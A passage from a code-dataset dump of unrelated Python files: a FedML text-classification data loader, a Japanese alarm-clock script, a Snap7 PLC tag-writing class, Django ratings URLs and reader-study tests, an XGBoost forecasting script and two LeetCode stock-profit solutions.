fedml.data.stackoverflow_lr.data_loader import (\n# load_partition_data_federated_stackoverflow_lr,\n# )\n# from fedml.data.stackoverflow_nwp.data_loader import (\n# load_partition_data_federated_stackoverflow_nwp,\n# )\n#\n# from .MNIST.data_loader import download_mnist\n# from .edge_case_examples.data_loader import load_poisoned_dataset\nimport logging\n\n\ndef load(args):\n return load_synthetic_data(args)\n\n\ndef combine_batches(batches):\n full_x = torch.from_numpy(np.asarray([])).float()\n full_y = torch.from_numpy(np.asarray([])).long()\n for (batched_x, batched_y) in batches:\n full_x = torch.cat((full_x, batched_x), 0)\n full_y = torch.cat((full_y, batched_y), 0)\n return [(full_x, full_y)]\n\n\ndef load_synthetic_data(args):\n dataset_name = args.dataset\n # check if the centralized training is enabled\n centralized = (\n True\n if (args.client_num_in_total == 1 and args.training_type != 
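# Centralized training: exactly one client outside cross-silo mode\n        # collapses the federated setup into a single local worker; the\n        # per-client data dicts are then merged under key 0 further below.\n        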
\"cross_silo\")\n else False\n )\n\n # check if the full-batch training is enabled\n args_batch_size = args.batch_size\n if args.batch_size <= 0:\n full_batch = True\n args.batch_size = 128 # temporary batch size\n else:\n full_batch = False\n logging.info(\"load_data. dataset_name = %s\" % dataset_name)\n attributes = BaseDataManager.load_attributes(args.data_file_path)\n num_labels = len(attributes[\"label_vocab\"])\n print(list(attributes[\"label_vocab\"].keys()))\n class_num = num_labels\n model_args = ClassificationArgs()\n model_args.model_name = args.model\n model_args.model_type = args.model_type\n # model_args.load(model_args.model_name)\n model_args.num_labels = num_labels\n model_args.update_from_dict(\n {\n \"fl_algorithm\": args.federated_optimizer,\n \"freeze_layers\": args.freeze_layers,\n \"epochs\": args.epochs,\n \"learning_rate\": args.learning_rate,\n \"gradient_accumulation_steps\": args.gradient_accumulation_steps,\n \"do_lower_case\": args.do_lower_case,\n \"manual_seed\": args.random_seed,\n # for ignoring the cache features.\n \"reprocess_input_data\": args.reprocess_input_data,\n \"overwrite_output_dir\": True,\n \"max_seq_length\": args.max_seq_length,\n \"train_batch_size\": args.batch_size,\n \"eval_batch_size\": args.eval_batch_size,\n \"evaluate_during_training\": False, # Disabled for FedAvg.\n \"evaluate_during_training_steps\": args.evaluate_during_training_steps,\n \"fp16\": args.fp16,\n \"data_file_path\": args.data_file_path,\n \"partition_file_path\": args.partition_file_path,\n \"partition_method\": args.partition_method,\n \"dataset\": args.dataset,\n \"output_dir\": args.output_dir,\n \"is_debug_mode\": args.is_debug_mode,\n \"fedprox_mu\": args.fedprox_mu,\n }\n )\n\n # model_args.config[\"num_labels\"] = num_labels\n if args.model_type == \"bert\":\n tokenizer_class = BertTokenizer\n elif args.model_type == \"distilbert\":\n tokenizer_class = DistilBertTokenizer\n tokenizer = tokenizer_class.from_pretrained(\n args.model, do_lower_case=args.do_lower_case\n )\n preprocessor = TCPreprocessor(\n args=model_args, label_vocab=attributes[\"label_vocab\"], tokenizer=tokenizer\n )\n dm = TextClassificationDataManager(\n args, model_args, preprocessor, 0, args.client_num_per_round\n )\n\n (\n train_data_num,\n test_data_num,\n train_data_global,\n test_data_global,\n train_data_local_num_dict,\n train_data_local_dict,\n test_data_local_dict,\n num_clients,\n ) = dm.load_federated_data()\n\n if centralized:\n train_data_local_num_dict = {\n 0: sum(\n user_train_data_num\n for user_train_data_num in train_data_local_num_dict.values()\n )\n }\n train_data_local_dict = {\n 0: [\n batch\n for cid in sorted(train_data_local_dict.keys())\n for batch in train_data_local_dict[cid]\n ]\n }\n test_data_local_dict = {\n 0: [\n batch\n for cid in sorted(test_data_local_dict.keys())\n for batch in test_data_local_dict[cid]\n ]\n }\n args.client_num_in_total = 1\n\n if full_batch:\n train_data_global = combine_batches(train_data_global)\n test_data_global = combine_batches(test_data_global)\n train_data_local_dict = {\n cid: combine_batches(train_data_local_dict[cid])\n for cid in train_data_local_dict.keys()\n }\n test_data_local_dict = {\n cid: combine_batches(test_data_local_dict[cid])\n for cid in test_data_local_dict.keys()\n }\n args.batch_size = args_batch_size\n\n dataset = [\n train_data_num,\n test_data_num,\n train_data_global,\n test_data_global,\n train_data_local_num_dict,\n train_data_local_dict,\n test_data_local_dict,\n class_num,\n ]\n return dataset, 
class_num\n\n\ndef load_poisoned_dataset_from_edge_case_examples(args):\n return load_poisoned_dataset(args=args)\n\n\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--run_id\", type=int, default=0)\n\n parser.add_argument(\"--is_debug_mode\", default=0, type=int, help=\"is_debug_mode\")\n\n # Data related\n # TODO: list all dataset names:\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"20news\",\n metavar=\"N\",\n help=\"dataset used for training\",\n )\n\n parser.add_argument(\n \"--data_file_path\",\n type=str,\n default=\"/home/ubuntu/fednlp_data/data_files/20news_data.h5\",\n help=\"data h5 file path\",\n )\n\n parser.add_argument(\n \"--partition_file_path\",\n type=str,\n default=\"/home/ubuntu/fednlp_data/partition_files/20news_partition.h5\",\n help=\"partition h5 file path\",\n )\n\n parser.add_argument(\n \"--partition_method\", type=str, default=\"uniform\", help=\"partition method\"\n )\n\n # Model related\n parser.add_argument(\n \"--model_type\",\n type=str,\n default=\"bert\",\n metavar=\"N\",\n help=\"transformer model type\",\n )\n\n parser.add_argument(\n \"--model_class\",\n type=str,\n default=\"transformer\",\n metavar=\"N\",\n help=\"model class\",\n )\n\n parser.add_argument(\n \"--model\",\n type=str,\n default=\"bert-base-uncased\",\n metavar=\"N\",\n help=\"transformer model name\",\n )\n parser.add_argument(\n \"--do_lower_case\",\n type=bool,\n default=True,\n metavar=\"N\",\n help=\"transformer model name\",\n )\n\n # Learning related\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=8,\n metavar=\"N\",\n help=\"input batch size for training (default: 8)\",\n )\n parser.add_argument(\n \"--eval_batch_size\",\n type=int,\n default=8,\n metavar=\"N\",\n help=\"input batch size for evaluation (default: 8)\",\n )\n\n parser.add_argument(\n \"--max_seq_length\",\n type=int,\n default=128,\n metavar=\"N\",\n help=\"maximum sequence length (default: 128)\",\n )\n\n parser.add_argument(\n \"--n_gpu\", type=int, default=1, metavar=\"EP\", help=\"how many gpus will be used \"\n )\n\n parser.add_argument(\n \"--fp16\", default=False, action=\"store_true\", help=\"if enable fp16 for training\"\n )\n parser.add_argument(\n \"--random_seed\", type=int, default=42, metavar=\"N\", help=\"random seed\"\n )\n\n # IO related\n parser.add_argument(\n \"--output_dir\",\n type=str,\n default=\"/tmp/\",\n metavar=\"N\",\n help=\"path to save the trained results and ckpts\",\n )\n\n # Federated Learning related\n parser.add_argument(\n \"--federated_optimizer\",\n type=str,\n default=\"FedAvg\",\n help=\"Algorithm list: FedAvg; FedOPT; FedProx \",\n )\n\n parser.add_argument(\n \"--backend\", type=str, default=\"MPI\", help=\"Backend for Server and Client\"\n )\n\n parser.add_argument(\n \"--comm_round\",\n type=int,\n default=10,\n help=\"how many round of communications we shoud use\",\n )\n\n parser.add_argument(\n \"--is_mobile\",\n type=int,\n default=1,\n help=\"whether the program is running on the FedML-Mobile server side\",\n )\n\n parser.add_argument(\n \"--client_num_in_total\",\n type=int,\n default=-1,\n metavar=\"NN\",\n help=\"number of clients in a distributed cluster\",\n )\n\n parser.add_argument(\n \"--client_num_per_round\",\n type=int,\n default=4,\n metavar=\"NN\",\n help=\"number of workers\",\n )\n\n parser.add_argument(\n \"--epochs\",\n type=int,\n default=3,\n metavar=\"EP\",\n help=\"how many epochs will be trained locally\",\n )\n\n parser.add_argument(\n 
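# Gradient accumulation trades memory for effective batch size: the\n        # loss of N micro-batches is back-propagated (scaled by 1/N) before a\n        # single optimizer step. Minimal sketch of such a client-side loop,\n        # all names hypothetical:\n        #   for i, batch in enumerate(loader):\n        #       (loss_fn(model(batch)) / accum_steps).backward()\n        #       if (i + 1) % accum_steps == 0:\n        #           optimizer.step(); optimizer.zero_grad()\n        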
\"--gradient_accumulation_steps\",\n type=int,\n default=1,\n metavar=\"EP\",\n help=\"how many steps for accumulate the loss.\",\n )\n\n parser.add_argument(\n \"--client_optimizer\",\n type=str,\n default=\"adam\",\n help=\"Optimizer used on the client. This field can be the name of any subclass of the torch Opimizer class.\",\n )\n\n parser.add_argument(\n \"--learning_rate\",\n type=float,\n default=0.1,\n metavar=\"LR\",\n help=\"learning rate on the client (default: 0.001)\",\n )\n\n parser.add_argument(\n \"--weight_decay\", type=float, default=0, metavar=\"N\", help=\"L2 penalty\"\n )\n\n parser.add_argument(\n \"--clip_grad_norm\", type=int, default=0, metavar=\"N\", help=\"L2 penalty\"\n )\n\n parser.add_argument(\n \"--server_optimizer\",\n type=str,\n default=\"sgd\",\n help=\"Optimizer used on the server. This field can be the name of any subclass of the torch Opimizer class.\",\n )\n\n parser.add_argument(\n \"--server_lr\",\n type=float,\n default=0.1,\n help=\"server learning rate (default: 0.001)\",\n )\n\n parser.add_argument(\n \"--server_momentum\", type=float, default=0, help=\"server momentum (default: 0)\"\n )\n\n parser.add_argument(\n \"--fedprox_mu\", type=float, default=1, help=\"server momentum (default: 1)\"\n )\n\n parser.add_argument(\n \"--evaluate_during_training\",\n default=False,\n metavar=\"EP\",\n help=\"the frequency of the evaluation during training\",\n )\n\n parser.add_argument(\n \"--evaluate_during_training_steps\",\n type=int,\n default=100,\n metavar=\"EP\",\n help=\"the frequency of the evaluation during training\",\n )\n\n parser.add_argument(\n \"--frequency_of_the_test\",\n type=int,\n default=1,\n help=\"the frequency of the algorithms\",\n )\n\n # GPU device management\n parser.add_argument(\n \"--gpu_mapping_file\",\n type=str,\n default=\"gpu_mapping.yaml\",\n help=\"the gpu utilization file for servers and clients. 
If there is no \\\n gpu_util_file, gpu will not be used.\",\n )\n\n parser.add_argument(\n \"--gpu_mapping_key\",\n type=str,\n default=\"mapping_default\",\n help=\"the key in gpu utilization file\",\n )\n\n parser.add_argument(\"--ci\", type=int, default=0, help=\"CI\")\n\n # cached related\n parser.add_argument(\n \"--reprocess_input_data\", action=\"store_true\", help=\"whether generate features\"\n )\n\n # freeze related\n parser.add_argument(\n \"--freeze_layers\", type=str, default=\"\", metavar=\"N\", help=\"freeze which layers\"\n )\n args = parser.parse_args(\"\")\n args.formulation = \"classification\"\n dataset, class_num = load(args)\n","sub_path":"python/app/fednlp/text_classification/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":13276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"200614736","text":"import sys\nimport time\nimport winsound\nfrom datetime import datetime\n\n\ndef input_alarm_time():\n \"\"\"\n 標準入力からアラーム時刻を取得する\n\n @return datetime.datetime アラーム時刻\n \"\"\"\n\n while True:\n now = datetime.now()\n print(f'現在の時刻 {now.hour:02d}:{now.minute:02d}')\n\n try:\n hm = input('アラーム時刻 (H:M) > ')\n except EOFError as e:\n raise e\n except KeyboardInterrupt:\n sys.exit(1)\n \n try:\n alarm_time = datetime.strptime(hm, '%H:%M')\n except ValueError:\n print('不正な時刻です', file=sys.stderr)\n continue\n \n break\n\n return alarm_time\n\n\ndef alarm_time_to_seconds(at, now):\n \"\"\"\n アラーム時刻を現在の時刻からの経過秒数に変換する\n\n @param datetime.datetime at セットされたアラーム時刻\n @param datetime.datetime now 現在の時刻\n\n @return int 秒数\n \"\"\"\n\n h24secs = 24*60*60\n atsecs = at.hour*60*60 + at.minute*60\n nowsecs = now.hour*60*60 + now.minute*60\n\n if atsecs >= nowsecs:\n secs = atsecs - nowsecs\n else:\n secs = atsecs + (h24secs - nowsecs)\n \n return secs - now.second\n\n\ndef wait(seconds):\n \"\"\"\n 引数の秒数だけ時間が経過するのを待つ\n\n @param int seconds 秒数\n \"\"\"\n\n try:\n for _ in range(seconds):\n now = datetime.now()\n print(f'\\r{now.hour:02d}:{now.minute:02d}:{now.second:02d}', end='')\n time.sleep(1)\n\n print()\n except KeyboardInterrupt as e:\n raise e\n\n\ndef alarm():\n \"\"\"\n アラームを発動する\n \"\"\"\n\n print('アラーム中') \n winsound.PlaySound('sound.wav', winsound.SND_FILENAME | winsound.SND_LOOP | winsound.SND_ASYNC)\n\n try:\n input('停止するには何かキーを押してください')\n except EOFError:\n print()\n except KeyboardInterrupt:\n sys.exit(1)\n\n winsound.PlaySound(None, winsound.SND_PURGE)\n\n\ndef main():\n while True:\n # アラーム時刻の入力\n try:\n tm = input_alarm_time()\n except EOFError:\n break\n\n # 入力した時刻を、現在の時刻からの経過時間の秒数に変換する\n seconds = alarm_time_to_seconds(tm, datetime.now())\n\n # 秒数が経過するのを待つ\n try:\n wait(seconds)\n except KeyboardInterrupt:\n print()\n continue\n\n # アラーム発動\n alarm()\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126147924","text":"from clientcomm_v1 import *\nfrom opcua import ua\nimport pandas as pd\nimport time\n\n__all__ = ['WriteGeneral']\n\n\n\nclass WriteGeneral():\n\n def __init__(self, client):\n self.client = client\n self.mylock = threading.Lock()\n\n # def write_tagmodifier(func):\n # def inner(self, tagname, setvalue):\n # browser_id = '7:' + tagname\n # return func(self, browser_id, setvalue)\n # return inner\n\n # @write_tagmodifier\n\n\n\n def readtagsymbol(self,tagname):\n n 
= 0\n while n < len(self.df.index):\n data = self.df.iloc[n, 1]\n if(data == tagname):\n byte = self.df.iloc[n, 3]\n bit = self.df.iloc[n, 4]\n datatype = self.df.iloc[n, 2]\n return byte,bit,datatype\n n = n + 1\n\n\n def writenodevalue(self, tagname, tagvalue):\n tag_id = str(tagname)\n self.df = pd.read_excel(r'C:\\OPCUA\\Working_VF1_5.xls', sheet_name='OPERATION')\n self.byte, self.bit, self.datatype = self.readtagsymbol(tagname)\n self.byte = int(self.byte)\n self.bit = int(self.bit)\n if self.datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['PE'], 0, self.byte,S7WLBit )\n set_bool(self.result, 0, self.bit, tagvalue)\n elif self.datatype == 'S7WLByte' or self.datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif self.datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif self.datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['PE'], 0, self.byte, self.result)\n\n\n def writesymbolvalue(self, address, tagvalue, datatype):\n addressconverted = float(address)\n self.byte = int(addressconverted)\n self.bit = round((addressconverted - self.byte)*10)\n if datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_bool(self.result, 0, self.bit, tagvalue)\n elif datatype == 'S7WLByte' or datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['PE'], 0, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['PE'], 0, self.byte, self.result)\n\n def writeDBvalue(self, address, tagvalue, datatype, dataarea):\n addressconverted = float(address)\n self.byte = int(addressconverted)\n self.bit = round((addressconverted - self.byte) * 10)\n self.dataarea = int(dataarea)\n\n if datatype == 'S7WLBit':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_bool(self.result, 0, self.bit, tagvalue)\n elif datatype == 'S7WLByte' or datatype == 'S7WLWord':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_int(self.result, 0, tagvalue)\n elif datatype == 'S7WLReal':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_real(self.result, 0, tagvalue)\n elif datatype == 'S7WLDWord':\n self.result = self.client.read_area(areas['DB'], self.dataarea, self.byte, S7WLBit)\n set_dword(self.result, 0, tagvalue)\n self.client.write_area(areas['DB'], self.dataarea, self.byte, self.result)\n\n def __getstate__(self):\n state = self.__dict__.copy()\n # Remove the unpicklable entries.\n del state['mylock']\n return state\n # try:\n # covertvalue = 0\n # var = self.plcname.get_child(tagname)\n #\n # value = var.get_value()\n #\n # variantType = var.get_data_type_as_variant_type()\n #\n # if str(variantType) == \"VariantType.Float\":\n # covertvalue = float(setvalue)\n #\n # else:\n # covertvalue = int(setvalue)\n #\n # dv = ua.DataValue(ua.Variant(covertvalue, variantType))\n #\n # var.set_value(dv)\n # return True\n # except Exception as 
e:\n # print(\"WRITE GENERAL ERROR IS :\",e.args)\n #\n # def __getstate__(self):\n # state = self.__dict__.copy()\n # # Remove the unpicklable entries.\n # del state['mylock']\n # return state\n #\n # # def __setstate__(self, state):\n # # # Restore instance attributes.\n # # self.__dict__.update(state)\n\n\n\n\n\n\n\n\n\n\n# Finall output\n\n# def final_output():\n# comm = Communication()\n# client = comm.opc_client_connect()\n# if client :\n# tag_name = str(input(\"please enter the tag name :\"))\n# writegenral = WriteGeneral(comm.PLC)\n# writegenral.writenodevalue(tag_name,1)\nif __name__ == \"__main__\":\n import general\n from snap7 import client as c\n comm_object = general.General()\n comm_object.writegeneral.writesymbolvalue('4.6',1,'S7WLBit')\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"CASTERSIMULATION/Common/.idea/writegeneral_v2.py","file_name":"writegeneral_v2.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435295740","text":"\"\"\"urlpatterns for productratings. Note that you do not need to add these to your urls anywhere, they'll be automatically added by the collect_urls signals.\"\"\"\nfrom django.conf import settings\nfrom django.urls import re_path, include\n\nfrom satchmo_ext.productratings.views import BestratingsListView\nimport logging\n\nlog = logging.getLogger('productratings.urls')\n\nproductpatterns = [\n re_path(r'^view/bestrated/$', BestratingsListView.as_view(), name='satchmo_product_best_rated'),\n]\n\n# Override comments with our redirecting view. You can remove the next two\n# URLs if you aren't using ratings.\n# (r'^comments/post/$', 'comments.post_rating', {'maxcomments': 1 }, 'satchmo_rating_post'),\nif 'django_comments' in settings.INSTALLED_APPS:\n comment_urls = 'django_comments.urls'\nelse:\n comment_urls = 'django.contrib.comments.urls'\n\ncommentpatterns = [\n re_path(r'^comments/', include(comment_urls)),\n]\n\n\ndef add_product_urls(sender, patterns=(), section=\"\", **kwargs):\n if section == \"product\":\n log.debug('adding ratings urls')\n patterns += productpatterns\n\n\ndef add_comment_urls(sender, patterns=(), **kwargs):\n log.debug('adding comments urls')\n patterns += commentpatterns\n","sub_path":"satchmo/apps/satchmo_ext/productratings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"201555589","text":"from recruit.feat2 import *\nimport datetime\nfrom tqdm import tqdm\nimport lightgbm as lgb\nfrom sklearn.cross_validation import KFold\nfrom sklearn.metrics import mean_squared_error\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error\n\n\ntrain_feat = pd.DataFrame()\nstart_date = '2017-01-29'\nfor i in range(20):\n train_feat_sub = make_feats(date_add_days(start_date, i*(-7)),39)\n train_feat = pd.concat([train_feat,train_feat_sub])\nfor i in range(1,6):\n train_feat_sub = make_feats(date_add_days(start_date,i*(7)),42-(i*7))\n train_feat = pd.concat([train_feat,train_feat_sub])\neval_feat = make_feats(date_add_days(start_date, 42),39)\n\n# lbl = LabelEncoder()\n# lbl.fit(list(train_feat['store_id'].values) + list(eval_feat['store_id'].values) + list(test_feat['store_id'].values))\n# train_feat['store_id'] = lbl.transform(train_feat['store_id'].values)\n# eval_feat['store_id'] = lbl.transform(eval_feat['store_id'].values)\n# test_feat['store_id'] = lbl.transform(test_feat['store_id'].values)\n# 
lbl.fit(list(train_feat['air_area_name'].values) + list(eval_feat['air_area_name'].values) + list(test_feat['air_area_name'].values))\n# train_feat['air_area_name'] = lbl.transform(train_feat['air_area_name'].values)\n# eval_feat['air_area_name'] = lbl.transform(eval_feat['air_area_name'].values)\n# test_feat['air_area_name'] = lbl.transform(test_feat['air_area_name'].values)\n\npredictors = [f for f in eval_feat.columns if f not in (['id','store_id','visit_date','end_date','air_area_name','visitors'])]\n\nparams = {'booster': 'gbtree',\n 'objective': 'reg:linear',\n 'eval_metric': 'rmse',\n 'max_depth': 5,\n 'lambda': 5,\n 'subsample': 0.8,\n 'colsample_bytree': 0.7,\n 'min_child_weight': 10, # 8~10\n 'eta': 0.05,\n 'seed': 66,\n # 'nthread':12\n }\n\nt0 = time.time()\nxgb_train = xgb.DMatrix(train_feat[predictors], train_feat['visitors'])\nxgb_eval = xgb.DMatrix(eval_feat[predictors], eval_feat['visitors'])\n\nwatchlist = [(xgb_train, 'train'), (xgb_eval, 'val')]\nmodel = xgb.train(params,\n xgb_train,\n 1000,\n evals=watchlist,\n verbose_eval=20,\n early_stopping_rounds=20)\nxgb_eval_pred = model.predict(xgb_eval)\nprint('线下的得分:{}'.format(mean_squared_error(eval_feat['visitors'],xgb_eval_pred)**0.5))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"recruit/xgb_eval.py","file_name":"xgb_eval.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560680879","text":"# Best Time to Buy and Sell Stock\n#initial Brute force approach I did\n#Time comp O(n2) and breached time limit\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n maxp=0\n pro=0\n for x in range(len(prices)):\n for y in range(x,len(prices)):\n if(prices[y]>prices[x]):\n pro =prices[y]-prices[x]\n if(pro>maxp):\n maxp=pro\n \n return maxpro\n\n\n\n\n\n\n\n\n#Best appraoch with time comp O(n) with only one for loop, learnt from editorial\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n maxp=0\n minp=sys.maxsize\n for x in range(len(prices)):\n if(prices[x]maxp):\n maxp = prices[x]-minp\n \n return maxp\n \n \n \n","sub_path":"Best Time to Buy and Sell Stock.py","file_name":"Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"40886418","text":"import pytest\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django_capture_on_commit_callbacks import capture_on_commit_callbacks\n\nfrom grandchallenge.reader_studies.models import Answer, Question, ReaderStudy\nfrom tests.factories import ImageFactory, UserFactory\nfrom tests.reader_studies_tests.factories import (\n AnswerFactory,\n QuestionFactory,\n ReaderStudyFactory,\n)\nfrom tests.utils import get_view_for_user\n\n\n@pytest.mark.django_db\ndef test_group_deletion():\n rs = ReaderStudyFactory()\n readers_group = rs.readers_group\n editors_group = rs.editors_group\n\n assert readers_group\n assert editors_group\n\n ReaderStudy.objects.filter(pk__in=[rs.pk]).delete()\n\n with pytest.raises(ObjectDoesNotExist):\n readers_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n editors_group.refresh_from_db()\n\n\n@pytest.mark.django_db\n@pytest.mark.parametrize(\"group\", [\"readers_group\", \"editors_group\"])\ndef test_group_deletion_reverse(group):\n rs = ReaderStudyFactory()\n readers_group = rs.readers_group\n editors_group = rs.editors_group\n\n assert readers_group\n assert 
editors_group\n\n getattr(rs, group).delete()\n\n with pytest.raises(ObjectDoesNotExist):\n readers_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n editors_group.refresh_from_db()\n\n with pytest.raises(ObjectDoesNotExist):\n rs.refresh_from_db()\n\n\n@pytest.mark.django_db\ndef test_read_only_fields():\n rs = ReaderStudyFactory()\n q = QuestionFactory(reader_study=rs)\n\n assert q.is_fully_editable is True\n assert q.read_only_fields == []\n\n AnswerFactory(question=q, answer=\"true\")\n\n assert q.is_fully_editable is False\n assert q.read_only_fields == [\n \"question_text\",\n \"answer_type\",\n \"image_port\",\n \"required\",\n ]\n\n\n@pytest.mark.django_db\ndef test_generate_hanging_list():\n rs = ReaderStudyFactory()\n im1 = ImageFactory(name=\"im1\")\n im2 = ImageFactory(name=\"im2\")\n\n rs.generate_hanging_list()\n assert rs.hanging_list == []\n\n rs.images.set([im1, im2])\n rs.generate_hanging_list()\n assert rs.hanging_list == [\n {\"main\": \"im1\"},\n {\"main\": \"im2\"},\n ]\n\n\n@pytest.mark.django_db\ndef test_progress_for_user(settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = ReaderStudyFactory()\n im1, im2 = ImageFactory(name=\"im1\"), ImageFactory(name=\"im2\")\n q1, q2, q3 = [\n QuestionFactory(reader_study=rs),\n QuestionFactory(reader_study=rs),\n QuestionFactory(reader_study=rs),\n ]\n\n reader = UserFactory()\n rs.add_reader(reader)\n\n question_perc = 100 / 6\n\n assert rs.get_progress_for_user(reader) == {\n \"diff\": 0.0,\n \"hangings\": 0.0,\n \"questions\": 0.0,\n }\n\n rs.images.set([im1, im2])\n rs.hanging_list = [{\"main\": im1.name}, {\"main\": im2.name}]\n rs.save()\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == 0\n\n a11 = AnswerFactory(question=q1, answer=\"foo\", creator=reader)\n a11.images.add(im1)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == pytest.approx(question_perc)\n\n a21 = AnswerFactory(question=q1, answer=\"foo\", creator=reader)\n a21.images.add(im2)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == pytest.approx(question_perc * 2)\n\n a12 = AnswerFactory(question=q2, answer=\"foo\", creator=reader)\n a12.images.add(im1)\n a13 = AnswerFactory(question=q3, answer=\"foo\", creator=reader)\n a13.images.add(im1)\n\n progress = rs.get_progress_for_user(reader)\n assert progress[\"hangings\"] == 50\n assert progress[\"questions\"] == pytest.approx(question_perc * 4)\n\n editor = UserFactory()\n rs.add_reader(editor)\n rs.add_editor(editor)\n\n for q in [q1, q2, q3]:\n for im in [im1, im2]:\n a = AnswerFactory(\n question=q, answer=\"foo\", creator=editor, is_ground_truth=True\n )\n a.images.add(im)\n\n progress = rs.get_progress_for_user(editor)\n assert progress[\"hangings\"] == 0\n assert progress[\"questions\"] == 0\n\n for q in [q1, q2, q3]:\n for im in [im1, im2]:\n a = AnswerFactory(\n question=q, answer=\"foo\", creator=editor, is_ground_truth=False\n )\n a.images.add(im)\n\n progress = rs.get_progress_for_user(editor)\n assert progress[\"hangings\"] == 100.0\n assert progress[\"questions\"] == 100.0\n\n\n@pytest.mark.django_db # noqa: C901\ndef test_leaderboard(reader_study_with_gt, settings): # noqa: C901\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1, r2 = 
rs.readers_group.user_set.all()\n e = rs.editors_group.user_set.first()\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=r1, answer=True)\n ans.images.add(im)\n\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 1\n user_score = scores[0]\n assert user_score[\"creator__username\"] == r1.username\n assert user_score[\"score__sum\"] == 6.0\n assert user_score[\"score__avg\"] == 1.0\n\n with capture_on_commit_callbacks(execute=True):\n for i, question in enumerate(rs.questions.all()):\n for j, im in enumerate(rs.images.all()):\n ans = AnswerFactory(\n question=question, creator=r2, answer=(i + j) % 2 == 0\n )\n ans.images.add(im)\n\n del rs.scores_by_user\n del rs.leaderboard\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 12\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 2\n for user_score in scores:\n if user_score[\"creator__username\"] != r2.username:\n continue\n assert user_score[\"score__sum\"] == 3.0\n assert user_score[\"score__avg\"] == 0.5\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=e, answer=True)\n ans.images.add(im)\n\n del rs.scores_by_user\n del rs.leaderboard\n leaderboard = rs.leaderboard\n assert Answer.objects.filter(is_ground_truth=False).count() == 18\n assert leaderboard[\"question_count\"] == 6.0\n scores = leaderboard[\"grouped_scores\"]\n assert len(scores) == 3\n for user_score in scores:\n if user_score[\"creator__username\"] != e.username:\n continue\n assert user_score[\"score__sum\"] == 6.0\n assert user_score[\"score__avg\"] == 1.0\n\n\n@pytest.mark.django_db # noqa - C901\ndef test_statistics(reader_study_with_gt, settings):\n settings.task_eager_propagates = (True,)\n settings.task_always_eager = (True,)\n\n rs = reader_study_with_gt\n r1, r2 = rs.readers_group.user_set.all()\n\n rs_questions = rs.questions.values_list(\"question_text\", flat=True)\n\n with capture_on_commit_callbacks(execute=True):\n for question in rs.questions.all():\n for im in rs.images.all():\n ans = AnswerFactory(question=question, creator=r1, answer=True)\n ans.images.add(im)\n\n statistics = rs.statistics\n assert Answer.objects.filter(is_ground_truth=False).count() == 6\n assert statistics[\"max_score_questions\"] == 2.0\n scores = statistics[\"scores_by_question\"]\n assert 